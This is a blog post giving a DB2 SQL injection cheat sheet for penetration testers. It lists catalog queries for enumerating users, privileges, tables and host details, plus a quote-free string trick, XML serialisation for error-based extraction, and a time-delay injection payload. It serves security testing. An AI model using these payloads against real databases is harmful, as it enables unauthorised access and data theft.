DB2 SQL injection cheat sheet

Nota: Hay una versión de esta entrada en Español aquí.

I’m sure we all (pentesters) make extensive use of pentestmonkey’s SQL injection cheat sheets. They are touchstones when it comes down to SQL injection, and most of the time they save the day. However, DB2 cheat sheet is one of the less complete in pentestmonkey’s website. It might be because it’s not a very common database engine and a fairly complex one. I’ve had the luck? of coming across lot’s of DB2 systems in my last and also in my current job. Hence the missing information was extremely annoying.

Following this lines there is a table with an updated DB2 SQL injection cheat sheet, using pentestmonkey’s as starting point. The updated/modified or new fields are marked with an asterisk (*). All of these queries have been tested on a Win32+DB2 v10.1.0, although I’ve also had the chance to test some on Z/OS+DB2 v9.x and v8.x and most of them work fine. Please note that I’m not a DB2 expert, so If you find errors or inaccurate information, or you know other exciting tricks, please feel free to contact me. Finally, I’ve uploaded some DB2 dumps of default privileges, tables with PUBLIC access, and other interesting stuff.

Version*
select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
select getvariable(‘sysibm.version’) from sysibm.sysdummy1 — (v8+)
select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
select service_level,bld_level from sysibmadm.env_inst_info
Comments select blah from foo — comment like this (double dash)
Current User
select user from sysibm.sysdummy1
select session_user from sysibm.sysdummy1
select system_user from sysibm.sysdummy1
List Users*
DB2 uses OS accounts. Those with DB2 access can be retrieved with:
select distinct(authid) from sysibmadm.privileges — priv required
select grantee from syscat.dbauth — incomplete results
select distinct(definer) from syscat.schemata — more accurate
select distinct(grantee) from sysibm.systabauth — same as previous
List Password Hashes N/A (OS User Accounts)
List Privileges
select * from syscat.tabauth — shows priv on tables
select * from syscat.tabauth where grantee = current user — shows privs for current user
List DBA Accounts* select distinct(grantee) from sysibm.systabauth where CONTROLAUTH=’Y’
Current Database select current server from sysibm.sysdummy1
List Databases* select distinct(table_catalog) from sysibm.tables
List Columns* select name, tbname, coltype from sysibm.syscolumns — also valid syscat and sysstat
List Tables
select table_name from sysibm.tables
select name from sysibm.systables
Find Tables From Column Name select tbname from sysibm.syscolumns where name=’username’
Select Nth Row* select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
Select Nth Char select substr(‘abc’,2,1) FROM sysibm.sysdummy1 — returns b
Bitwise AND/OR/NOT/XOR* select bitand(1,0) from sysibm.sysdummy1 — returns 0. Also available bitandnot, bitor, bitxor, bitnot
ASCII Value -> Char select chr(65) from sysibm.sysdummy1 — returns ‘A’
Char -> ASCII Value select ascii(‘A’) from sysibm.sysdummy1 — returns 65
Casting
select cast(’123′ as integer) from sysibm.sysdummy1
select cast(1 as char) from sysibm.sysdummy1
String Concat
select ‘a’ concat ‘b’ concat ‘c’ from sysibm.sysdummy1 — returns ‘abc’
select ‘a’ || ‘b’ from sysibm.sysdummy1 — returns ‘ab’
IF Statement* Seems only allowed in stored procedures. Use case logic instead.
Case Statement* select CASE WHEN (1=1) THEN ‘AAAAAAAAAA’ ELSE ‘BBBBBBBBBB’ END from sysibm.sysdummy1
Avoiding Quotes* SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 — returns “ADRI”. Works without select too
Time Delay*
Heavy queries, for example:
‘ and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 — If user starts with ascii 68 (‘D’), the heavy query will be executed, delaying the response. However, if user doesn’t start with ascii 68, the heavy query won’t execute and thus the response will be faster.
Serialize to XML (for error based)*
select xmlagg(xmlrow(table_schema)) from sysibm.tables — returns all in one xml-formatted string
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) — Same but without repeated elements
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables — returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
Make DNS Requests N/A
Command Execution Seems it’s only allowed from procedures or UDFs.
Local File Access I think this is only available through stored procedures or db2 tool.
Hostname/IP and OS INFO* select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info — requires priv
Location of DB Files* select * from sysibmadm.reg_variables where reg_var_name=’DB2PATH’ — requires priv
System Config*
select dbpartitionnum, name, value from sysibmadm.dbcfg where name like ‘auto_%’ — Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg — Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
Default System Databases* What makes sense for DB2 is to know default System Schemas (and maybe tables):
SYSIBM/SYSCAT/SYSSTAT/SYSPUBLIC/SYSIBMADM/SYSTOOLS
About these ads
Tagged with: , , , ,
Publicado en seguridad, web hacking
2 comments on “DB2 SQL injection cheat sheet
  1. [...] Note: There is an English version of this post here. [...]

Deja un comentario

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Archive
Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

A %d blogueros les gusta esto: